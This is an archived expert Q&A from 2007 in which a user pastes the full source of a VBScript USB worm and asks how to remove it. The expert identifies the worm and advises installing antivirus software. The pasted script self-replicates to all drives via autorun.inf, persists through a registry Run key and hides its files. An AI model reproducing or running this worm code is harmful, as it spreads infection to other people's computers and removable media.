Expert: Carolyn Meinel - 2/10/2007

Question
Hello,

I got hit by a virus. It places a vbs file in all harddrives and flashdisks. Looking at the vbs file (as far as my untrained eye could see), it puts some entries in the registry and the start-up. I tried deleting the file and  removing the registry entries, but the next time I boot up, it is still there. Here is the content of the vbs file:

'THIS IS A MODIFIED VERSION BY:
on error resume next
dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd
atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe FS6519.dll.vbs"
set fs = createobject("Scripting.FileSystemObject")
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
mysource=mysource&text.readline
mysource=mysource & vbcrlf
loop
do
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & "FS6519.dll.vbs")
tf.attributes = 32
set tf=fs.createtextfile(winpath & "FS6519.dll.vbs",2,true)
tf.write mysource
tf.close
set tf = fs.getfile(winpath & "FS6519.dll.vbs")
tf.attributes = 39
for each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" then
set tf=fs.getfile(flashdrive.path &"FS6519.dll.vbs")
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &"FS6519.dll.vbs",2,true)
tf.write mysource
tf.close
set tf=fs.getfile(flashdrive.path &"FS6519.dll.vbs")
tf.attributes =39
set tf =fs.getfile(flashdrive.path &"autorun.inf")
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &"autorun.inf",2,true)
tf.write atr
tf.close
set tf =fs.getfile(flashdrive.path &"autorun.inf")
tf.attributes=39
end if
next
set rg = createobject("WScript.Shell")
rg.regwrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunFS6519",winpath&"FS6519.dll.vbs"
rg.regwrite "HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMainWindow Title","TAGA LIPA ARE!"
if check <> 1 then
Wscript.sleep 200000
end if
loop while check<>1
set sd = createobject("Wscript.shell")
sd.run winpath&"explorer.exe /e,/select, "&Wscript.ScriptFullname

Thanks in advance,
Nino

Answer
That is the TAGA LIPA ARE virus. Any up-to-date antivirus program should remove it. Instead of trying to do by hand what any decent antivirus program should have done for you, I suggest that you uninstall whatever antivirus you were running and instead install the free trial version of F-Secure Internet Security, http://www.f-secure.com/home_user/support_and_downloads/evaluations/

In the future, it is a good idea to use a complete Internet security suite because they include protection from all sorts of break-ins through their firewalls and also protection against adware and spyware.

Also, don't use Internet Explorer or Outlook because they make it easy for the bad guys and viruses to break in. Instead you can use the much safer Firefox browser and Thunderbird email client, both free at www.mozilla.org.